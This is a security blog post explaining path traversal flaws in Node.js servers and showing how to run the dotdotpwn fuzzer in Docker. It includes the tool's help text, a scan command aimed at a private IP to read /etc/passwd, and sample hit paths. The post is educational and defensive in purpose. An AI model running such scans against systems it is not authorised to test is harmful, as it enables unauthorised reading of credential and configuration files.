NodeJS Path Traversal Vulnerability Scanner

In this Node.js Security blog I write a lot about secure coding practices for Node.js applications but today I want to show you a more offensive side of security - a NodeJS path traversal vulnerability scanner.

What is a path traversal vulnerability?

Path traversal vulnerabilities are a type of security vulnerability that allows an attacker to read files on the (Node.js backend) server that they should not be able to read. I mentioned Node.js backend in parenthesis because that is mostly the target but this is also true for any compute and server-side technology such as serving requests from AWS Lambdas, Vercel functions or server-side rendered Nuxt and Next.js API routes.

The existing of a path traversal vulnerability can be used to read sensitive files such as configuration files, source code, and more. Think about what could happen if an attacker could read your .env file or your package.json file - they gain a lot of information about your running Node.js application and can use that information to further attack your application, pivot to other systems or escalate their privileges.

In 2022, I spoke at NodeConf EU, the premier Node.js conference in Europe, about the topic of Path Traversal vulnerabilities in Node.js applications. The talk was titled “Char Wars: The Path Traversal Strikes Back” and you can watch the recording of the talk on YouTube:

In this talk, I demonstrated how path traversal vulnerabilities can be exploited in Node.js applications and how to prevent them. I also demonstrated how the Node.js runtime was vulnerable to this type of attack and how it was fixed. You’re invited to watch the talk recording or read up on this quick write-up that re-caps the steps to reconstruct a path traversal scanner that offensive hackers would use.

A Path Traversal Scanner

So as I said in the intro, in this blog post, I will show you how to use a tool that actively make dynamic HTTP requests to find Path Traversal vulnerabilities in your Node.js applications.

Meet dotdotpwn, a command-line tool (written in Perl! Exotic 😆) that makes use of a dictionary of directory patterns that traverse out of a given path. By sending crafted requests with these path traversal patterns to a running server, the tool enumerates thousands of file paths in aim to find a true positive instance that proves the running server is vulnerable to a path traversal attack.

Executing a Path Traversal Scan

You can clone the dotdotpwn source repository and run it from source, or better yet, you can use a pre-built Docker image that contains all the dependencies and the tool itself, making it easier to run the tool without having to install Perl and its dependencies.

To follow along this write-up, you can refer to my GitHub repository of a Docker container image for dotdotpwn: https://github.com/lirantal/dotdotpwn-docker.git

👋 Just a quick break

I'm Liran Tal and I'm the author of the newest series of expert Node.js Secure Coding books. Check it out and level up your JavaScript

Based on the above, we can invoke the --help command to see the available options and arguments that the tool dotdotpwn tool accepts:

#
# 1. set up the Docker image first:
# git clone https://github.com/lirantal/dotdotpwn-docker.git
# cd dotdotpwn-docker
# docker build -t dotdotpwn .
#
# 2. run the tool:
docker run --rm -it --name dotdotpwn $(docker build -q .) --help
# 
# 3. give it a good 10 minutes - it is fetching assets and building the image

If everything is successful, you should see an output similar to the following:

#################################################################################
#                                                                               #
#  CubilFelino                                                       Chatsubo   #
#  Security Research Lab              and            [(in)Security Dark] Labs   #
#  chr1x.sectester.net                             chatsubo-labs.blogspot.com   #
#                                                                               #
#                               pr0udly present:                                #
#                                                                               #
#  ________            __  ________            __  __________                   #
#  \______ \    ____ _/  |_\______ \    ____ _/  |_\______   \__  _  __ ____    #
#   |    |  \  /  _ \\   __\|    |  \  /  _ \\   __\|     ___/\ \/ \/ //    \   #
#   |    `   \(  <_> )|  |  |    `   \(  <_> )|  |  |    |     \     /|   |  \  #
#  /_______  / \____/ |__| /_______  / \____/ |__|  |____|      \/\_/ |___|  /  #
#          \/                      \/                                      \/   #
#                              - DotDotPwn v3.0.2 -                             #
#                         The Directory Traversal Fuzzer                        #
#                         http://dotdotpwn.sectester.net                        #
#                            dotdotpwn@sectester.net                            #
#                                                                               #
#                               by chr1x & nitr0us                              #
#################################################################################

Usage: dotdotpwn.pl -m <module> -h <host> [OPTIONS]
	Available options:
	-m	Module [http | http-url | ftp | tftp | payload | stdout]
	-h	Hostname
	-O	Operating System detection for intelligent fuzzing (nmap)
	-o	Operating System type if known ("windows", "unix" or "generic")
	-s	Service version detection (banner grabber)
	-d	Depth of traversals (e.g. deepness 3 equals to ../../../; default: 6)
	-f	Specific filename (e.g. /etc/motd; default: according to OS detected, defaults in TraversalEngine.pm)
	-E	Add @Extra_files in TraversalEngine.pm (e.g. web.config, httpd.conf, etc.)
	-S	Use SSL for HTTP and Payload module (not needed for http-url, use a https:// url instead)
	-u	URL with the part to be fuzzed marked as TRAVERSAL (e.g. http://foo:8080/id.php?x=TRAVERSAL&y=31337)
	-k	Text pattern to match in the response (http-url & payload modules - e.g. "root:" if trying /etc/passwd)
	-p	Filename with the payload to be sent and the part to be fuzzed marked with the TRAVERSAL keyword
	-x	Port to connect (default: HTTP=80; FTP=21; TFTP=69)
	-t	Time in milliseconds between each test (default: 300 (.3 second))
	-X	Use the Bisection Algorithm to detect the exact deepness once a vulnerability has been found
	-e	File extension appended at the end of each fuzz string (e.g. ".php", ".jpg", ".inc")
	-U	Username (default: 'anonymous')
	-P	Password (default: 'dot@dot.pwn')
	-M	HTTP Method to use when using the 'http' module [GET | POST | HEAD | COPY | MOVE] (default: GET)
	-r	Report filename (default: 'HOST_MM-DD-YYYY_HOUR-MIN.txt')
	-b	Break after the first vulnerability is found
	-q	Quiet mode (doesn't print each attempt)
	-C	Continue if no data was received from host

We can now continue to launch a dynamic application security scan against a target server that we suspect is vulnerable to a path traversal attack. The tool accepts a variety of arguments to configure the scan, such as the target URL, the dictionary file to use, the number of threads to use, and more.

docker run --rm -it --name dotdotpwn $(docker build -q .) -m http-url -k "localhost" -f /etc/passwd -t 5 -b -u http://10.10.167.195:3112/public/TRAVERSAL

You’ll specifically notice how we use command-line arguments to filter the noise and focus on true positive results only. The -k argument is used to match a specific string in the response, and the -f argument is used to specify a specific file to look for.

Running the above command will produce output results such as:

[+] http://10.10.167.195:3112/public/\.../etc/passwd
[+] http://10.10.167.195:3112/public//\.../etc/passwd
[+] http://10.10.167.195:3112/public/foo/../etc/passwd

...

The scan continues with HTTP requests to the target server, and if a match is found, it will be printed to the console output and show you the path traversal pattern that was successful.